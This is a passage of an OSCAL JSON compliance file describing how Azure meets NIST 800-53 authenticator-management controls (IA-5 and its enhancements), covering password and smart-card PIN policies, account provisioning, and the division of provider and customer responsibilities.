statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1213539c-3d1e-442b-bcbf-52cc69a9cb8f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5","statements":[{"uuid":"bdccd6b2-9e8d-4fd7-a46c-9b80dbe57bae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.a","by-components":[{"uuid":"7009c19e-aefb-4af9-af00-8d50f8be9c33","export":{"provided":[{"uuid":"0d9c025e-8ad7-4466-8263-066f80d9a3a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-019"}],"description":"For personnel supporting Azure services, user accounts within Azure domains tie to accounts of existing Microsoft personnel using their unique Microsoft CorpNet aliases. 
CorpNet and Azure access are provisioned and managed using separate account management tools. CorpNet account management, using MyAccess, cannot provide access to Azure - it can only provide access to AD security groups that the Azure account management tool, OneIdentity, leverages. The alias is consistent across all of a user's accounts.\n\nAzure utilizes the AME and GME domains for access to the Azure environment. These domains are specific to the environment.\n\nThe identities of accounts are verified during the account request process, where initial authenticator distribution information for new Azure domain accounts is sent to the user's CorpNet e-mail address. Initial authenticator distribution is only sent to the CorpNet e-mail account associated with the provisioning request, after manager approval has been received. Azure-issued smart cards are distributed in person by the C+AI Security smart card support team after confirming the identity of the individual receiving the smart card."}],"responsibilities":[{"uuid":"d9b9345a-d064-4d2b-8621-8c9a16a529ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-019"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator management and content.","provided-uuid":"0d9c025e-8ad7-4466-8263-066f80d9a3a9"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"afaa1b97-fb98-4f56-a68b-00ca73bc146c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.b","by-components":[{"uuid":"ad14ec07-129d-428a-8740-bb5148214539","export":{"provided":[{"uuid":"4a1a99d4-a106-43ce-82cc-bc99f613e1e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-020"}],"description":"At the time of initial account creation, Active Directory assigns a unique identification and random temporary password which meets Microsoft Corporate and Azure policy requirements. Active Directory maintains the unique identification associated with the account throughout the life of the account. Account identification is never repeated within Active Directory._x000D_ _x000D_ After receiving account creation approval from his/her manager, a new user receives an email from MyAccess regarding her or his request. This email has a URL pointer to a uniquely generated page to get a temporary password. This password is randomly generated and may be reset after one (1) day. The initial password generated is in accordance with Azure identity management baseline requirements including complexity and length requirements. After the smart card has been provided to the user, the C+AI Security Smart Card support staff sends an email with an initial PIN for the smart card that needs to be reset. 
Certain domains are passwordless - the smart card PIN is the authentication method for the account."}],"responsibilities":[{"uuid":"90f34c40-b143-404f-89c5-32425ca5bd3d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-020"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator content.","provided-uuid":"4a1a99d4-a106-43ce-82cc-bc99f613e1e2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"403a6727-49c1-44cf-aa18-627f1fda6a27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.c","by-components":[{"uuid":"6bcce3c9-7ee0-42fa-8eb1-2dba0184dfe3","export":{"provided":[{"uuid":"82f2a7f7-8170-4622-be45-b79ca8572827","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-021"}],"description":"Issued passwords meet Microsoft Corporate and Azure policy requirements respectively for password complexity. Initial Smart Card certificates are generated by Core Services Engineering and Operations (CSEO). Azure implements a minimum password length of at least fifteen (15) characters and complexity of at least one (1) uppercase, one (1) lowercase, one (1) number, and one (1) special character in accordance with C+AI Security policy. Smart cards are FIPS-140-2 level 3 validated to ensure sufficient strength of hardware token. 
PINs are required to be at least four characters."}],"responsibilities":[{"uuid":"2f2f585d-6cc9-4dc6-a353-69c3ba9b0fa0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-021"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator content and password strength.","provided-uuid":"82f2a7f7-8170-4622-be45-b79ca8572827"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"525a9586-691c-4bf9-a5b1-8943306b7a07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-022"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.d","by-components":[{"uuid":"7897879b-8081-4e27-aed9-babdb81c5655","export":{"provided":[{"uuid":"6cbf723a-f4eb-46fa-828a-7a0d43a61087","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-022"}],"description":"Initial authenticator distribution procedures are noted above. 
If an authenticator is lost or compromised, Azure administrators reset, re-issue, or revoke the authenticator as needed."}],"responsibilities":[{"uuid":"32eab046-53cc-40e6-bf3a-f3a1f46e2f7f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-022"}],"description":"**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for federal/customer user authenticator management and content.","provided-uuid":"6cbf723a-f4eb-46fa-828a-7a0d43a61087"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9380fd72-6416-4550-808d-f88130d9c855","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-023"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.e","by-components":[{"uuid":"50f27af8-697a-43af-be7e-3fd3ca111e0e","export":{"provided":[{"uuid":"68727d43-ae86-479b-973b-6dc73b27b28a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-023"}],"description":"Default authentication credentials are often well known, easily discoverable, and present a significant security risk. Therefore, they are changed upon installation. The local administrator account is renamed and disabled. 
Default passwords are changed for the local administrator account and root accounts for network devices (including SNMP community strings)."}],"responsibilities":[{"uuid":"6f750372-e483-45a4-8238-8375c7783563","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-023"}],"description":"The customer is responsible for managing their authenticators, including changing default content of authenticators prior to deployment.","provided-uuid":"68727d43-ae86-479b-973b-6dc73b27b28a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dc15b194-b01a-458e-89b9-b2d860489b40","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-024"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.f","by-components":[{"uuid":"e412b927-1abd-4d96-b8d0-89a8adb90202","export":{"provided":[{"uuid":"1809fb29-0af6-4f76-96c3-97e39987606b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-024"}],"description":"Authenticator requirements for domain accounts are the following:\n\n* Enforce password history = 24 passwords remembered\n* Maximum password age = 70 days\n* Minimum password age = 1 day\n\nThese requirements are defined and managed by C+AI Security. For smart cards, PINs are required to be at least four digits. 
PINs do not currently have maximum lifetimes."}],"responsibilities":[{"uuid":"21a99de5-11a1-4944-b094-f942ed1ac1ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-024"}],"description":"The customer is responsible for managing their authenticators, including the establishment of minimum and maximum lifetime restrictions and reuse conditions for authenticators.","provided-uuid":"1809fb29-0af6-4f76-96c3-97e39987606b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4b04bc27-0a41-4f2f-bbb3-715845c2e890","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-025"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.g","by-components":[{"uuid":"9c300514-e87f-4097-bc6b-e6a77ce45249","export":{"provided":[{"uuid":"a6df12cc-8683-42f8-ba30-77ace2a7f412","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-025"}],"description":"Passwords must be changed every seventy (70) days. This is defined within Identity Management Baseline. This is enforced through Azure Active Directory domain policy settings. Azure considers the incremental risk between 70-day password resets and 60-day password reset values to be minimal.\n\nAzure implements strong password complexity, password expiration, password history, account lockout, and minimum password length per Microsoft Security Standards. Additionally, the use of multifactor authentication further provides strong security controls against credential guessing attacks. 
Azure considers these mitigating factors sufficient to address the incremental risk between Azure and the required values for password expiration.\n\nFor smart cards, PINs are required to be at least four digits. PINs do not currently have maximum lifetimes."}],"responsibilities":[{"uuid":"ccdf068d-323d-48bc-9681-c48b53743d7f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-025"}],"description":"The customer is responsible for managing their authenticators, including changing and refreshing authenticators, and the corresponding time period after which an update is required for each authenticator type.","provided-uuid":"a6df12cc-8683-42f8-ba30-77ace2a7f412"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"de029885-07a6-444b-a26f-0731507d62ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-026"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.h","by-components":[{"uuid":"ecefff04-1d43-460a-8885-b889e31265f1","export":{"provided":[{"uuid":"33d04897-8893-4e7a-9037-967a99ef8c6b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-026"}],"description":"Azure utilizes obscuring mechanisms to protect authenticator content in accordance with the Active Directory settings, specifically the use of encryption to protect stored authenticator information. 
This includes maintaining possession of individual authenticators, not loaning or sharing authenticators with others, and reporting lost or compromised authenticators immediately."}],"responsibilities":[{"uuid":"80ff35c4-306a-4d0a-b6b7-e43163b451de","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-026"}],"description":"The customer is responsible for managing and protecting their authenticator content from unauthorized disclosure and modification.","provided-uuid":"33d04897-8893-4e7a-9037-967a99ef8c6b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ea7e96c1-8e83-44e7-a0b8-5687ce5fc303","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5_smt.i","by-components":[{"uuid":"5c046efe-c0c7-4c0b-83c2-10880c6386ea","export":{"provided":[{"uuid":"ff64c6f5-d48d-45ea-9c23-178fa3206bdc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-027"}],"description":"Per the Microsoft Security Program Policy, authenticators must not be shared or revealed to anyone other than the authorized user. Additionally, authenticators must be promptly changed if they are suspected of being known by unauthorized individuals. 
Authenticators must not be written down or stored in readable form in batch files, automatic log-in scripts, software macros, terminal function keys, in computers without access control, or in other locations where unauthorized persons might discover them, and must be masked or encrypted both in storage and transmission. Azure utilizes credential scanning software to review Microsoft source code for unencrypted credentials, and implements Azure Storage automatic encryption for data at rest and HTTPS/TLS 1.2 everywhere for data in transit."}],"responsibilities":[{"uuid":"bf38ab7d-3c93-44eb-b1ab-be7b87e0f6d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-027"}],"description":"The customer is responsible for managing their authenticators, including requiring individuals to take, and devices to implement, specific security safeguards to protect authenticators.","provided-uuid":"ff64c6f5-d48d-45ea-9c23-178fa3206bdc"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6526469d-711c-4387-b057-cc66d1cd7395","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.1","statements":[{"uuid":"5a5bcc08-5542-468f-b1d8-fcea45ac8ed8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.a","by-components":[{"uuid":"fcb602ba-b3d9-4b05-8811-87a7dec31445","export":{"provided":[{"uuid":"06160294-e4b6-40bb-95f3-2595d580d358","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-028"}],"description":"The Azure AD Identity Protection team constantly analyzes Azure AD security telemetry data looking for commonly used weak or compromised passwords. Specifically, the analysis looks for base terms that often are used as the basis for weak passwords. When weak terms are found, they're added to the global banned password list. 
The contents of the global banned password list aren't based on any external data source, but on the results of Azure AD security telemetry and analysis."}],"responsibilities":[{"uuid":"074930f7-427a-4f03-8c0f-e369a4083fd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-028"}],"description":"The customer is responsible for maintaining a list of commonly-used, expected, or compromised passwords and updating the list regularly and when organizational passwords are suspected to have been compromised directly or indirectly.","provided-uuid":"06160294-e4b6-40bb-95f3-2595d580d358"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"de7b11ca-e0c1-4fb3-858d-3d87cb834c00","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.b","by-components":[{"uuid":"1a7931fb-ca3a-47ad-8836-7c00e8f13864","export":{"provided":[{"uuid":"ca1c4fcf-c00c-4322-82a2-f410d58a4bc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-029"}],"description":"When a password is changed or reset for any user in an Azure AD tenant, the current version of the global banned password list is used to validate the strength of the password. 
This validation check results in stronger passwords for all Azure AD customers."}],"responsibilities":[{"uuid":"67ffb823-618f-49df-a34d-420f55bf34ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-029"}],"description":"The customer is responsible for verifying, when created or updated, that the passwords are not found on the list of commonly-used, expected, or compromised passwords in IA-5(1)(a).","provided-uuid":"ca1c4fcf-c00c-4322-82a2-f410d58a4bc7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"88de2efd-80ce-4c4a-92b5-e08aea67978c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.c","by-components":[{"uuid":"e65a5373-2114-4183-b9df-42dde8993897","export":{"provided":[{"uuid":"55491183-d001-4c3e-ad00-bb2199b8291d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-030"}],"description":"Where passwords exist, Azure applies cryptographic protection to all passwords in transit. This is a built-in function of Active Directory. 
Azure leverages HTTPS and TLS 1.2/1.3 protocols for encryption of data in transit."}],"responsibilities":[{"uuid":"0d6ba2f7-f9cc-4ecd-94eb-64e2b3a6bba4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-030"}],"description":"The customer is responsible for ensuring passwords are transmitted only over cryptographically-protected channels.","provided-uuid":"55491183-d001-4c3e-ad00-bb2199b8291d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0005982b-d2ca-4525-86a8-d2c96aa38db5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.d","by-components":[{"uuid":"88a61fcb-4910-43e0-80c9-f2b2800ecf43","export":{"provided":[{"uuid":"10a0032d-f7ba-435b-b792-639612326488","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-031"}],"description":"Where passwords exist, Azure applies cryptographic protection to all passwords in transmission. 
This is a built-in function of Active Directory."}],"responsibilities":[{"uuid":"13f84eb4-e195-428d-9049-abe0a3ebd08f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-031"}],"description":"The customer is responsible for ensuring passwords are stored using approved cryptographic protections.","provided-uuid":"10a0032d-f7ba-435b-b792-639612326488"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"993e421b-c391-4d05-a56b-0646824b49a2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.e","by-components":[{"uuid":"26ced37f-2999-4b07-8e75-5a652b3f4f3e","export":{"provided":[{"uuid":"11f72fce-9ec0-4151-898d-6d1c4d6db063","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-032"}],"description":"Where passwords exist, during account creation and recovery, the user is provided with a randomly generated password that must be changed upon initial login."}],"responsibilities":[{"uuid":"dc165729-69d3-439e-aa37-010e03317dc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-032"}],"description":"The customer is responsible for requiring immediate selection of a new password upon account recovery.","provided-uuid":"11f72fce-9ec0-4151-898d-6d1c4d6db063"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"47a1f9b6-334e-44af-aa17-a20588371798","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.f","by-components":[{"uuid":"e57164a4-fd9d-452a-9d94-4158aa0850fd","export":{"provided":[{"uuid":"dda7e4e4-f015-4c55-a984-88643dcda499","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-033"}],"description":"Where passwords exist, Active Directory allows passwords and passphrases up to 128 characters in length, and allows the entire set of 95 printable ASCII characters."}],"responsibilities":[{"uuid":"6b52ea9b-ef45-45c9-abb7-fc9cb9937d3c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-033"}],"description":"The customer is responsible for allowing user selection of long passwords and passphrases, including spaces and all printable characters on customer deployed resources.","provided-uuid":"dda7e4e4-f015-4c55-a984-88643dcda499"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"011fd892-ab7e-477b-afab-f12c4a0f30e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.g","by-components":[{"uuid":"69bf722a-5df3-4f8c-a739-91f834bc2df6","export":{"provided":[{"uuid":"f22597dd-9706-4acd-84ac-a50e10bd0384","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-034"}],"description":"Where passwords are used, Azure uses Active Directory to determine if password authenticators are sufficiently strong to satisfy the password length, complexity, rotation and lifetime restrictions. Active Directory ensures that the password authenticator strength at creation is sufficient."}],"responsibilities":[{"uuid":"bb5954a5-da8d-47d0-9616-2f3f5af46405","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-034"}],"description":"The customer is responsible for employing automated tools to assist the user in selecting strong password authenticators on customer deployed resources.","provided-uuid":"f22597dd-9706-4acd-84ac-a50e10bd0384"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7ec9c74c-cba3-4d70-84f6-12116e25d193","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-5.1_smt.h","by-components":[{"uuid":"dde07fff-a105-4c93-abed-65343a65ac79","export":{"provided":[{"uuid":"d1ed4656-0a63-4c0f-bc6a-5cf626359130","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-035"}],"description":"Azure requires multifactor authentication for all access. Exceptions exist for assets or accounts that are unable to support smart card authentication, including local accounts and certain network devices. Where passwords exist, Azure exceeds Microsoft requirements and implements a minimum password length of at least fifteen (15) characters and complexity of at least one (1) uppercase, one (1) lowercase, one (1) number, and one (1) special character in accordance with C+AI Security policy."}],"responsibilities":[{"uuid":"7dbfaa2b-8187-402a-b196-98c143469d67","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-035"}],"description":"The customer is responsible for enforcing password composition and complexity rules on customer deployed resources.","provided-uuid":"d1ed4656-0a63-4c0f-bc6a-5cf626359130"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c52d0ecf-105a-4645-a667-edb3fe20d6d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-5.2","statements":[{"uuid":"c68e1fc6-963e-46d7-87fc-296b2bf0d3eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-037"}],"statement-id":"ia-5.2_smt.a","by-components":[{"uuid":"3619c524-0231-49af-a8ed-c88f736779e1","export":{"provided":[{"uuid":"29c04531-bbfb-4262-9d57-bb9aa03180df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-036"}],"description":"Microsoft protects private keys by enforcing appropriate and authorized access restrictions."},{"uuid":"4ffaa4a7-ada0-40f2-949e-d8c271eeb4fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-037"}],"description":"Smart card certificates include user information for the purposes of mapping the smart card identity to the Active Directory account of the card holder."}],"responsibilities":[{"uuid":"bfd606b9-21aa-487d-ae74-1928bb18346d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-036"}],"description":"The customer is responsible for employing PKI-based authentication and enforcing authorized access to private keys within customer-deployed 
resources.","provided-uuid":"29c04531-bbfb-4262-9d57-bb9aa03180df"},{"uuid":"eb3347e1-2b54-4b94-bc5a-410a543c074b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-037"}],"description":"The customer is responsible for employing PKI-based authentication with the ability to map each authenticated identity to the account of the corresponding individual or group within customer-deployed resources.","provided-uuid":"4ffaa4a7-ada0-40f2-949e-d8c271eeb4fa"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"74c83659-8b8e-4bd2-af58-534ff233f7aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-039"}],"statement-id":"ia-5.2_smt.b","by-components":[{"uuid":"e9d4b088-1b22-480e-81e2-980b1c9946f7","export":{"provided":[{"uuid":"09161c7e-d4d5-4efe-826f-8f73fc6eeef2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-038"}],"description":"Microsoft's corporate PKI has been established to provide a variety of digital certificate services to support operations for Azure and for the Microsoft corporation. The Microsoft corporate PKI functions as the Certificate 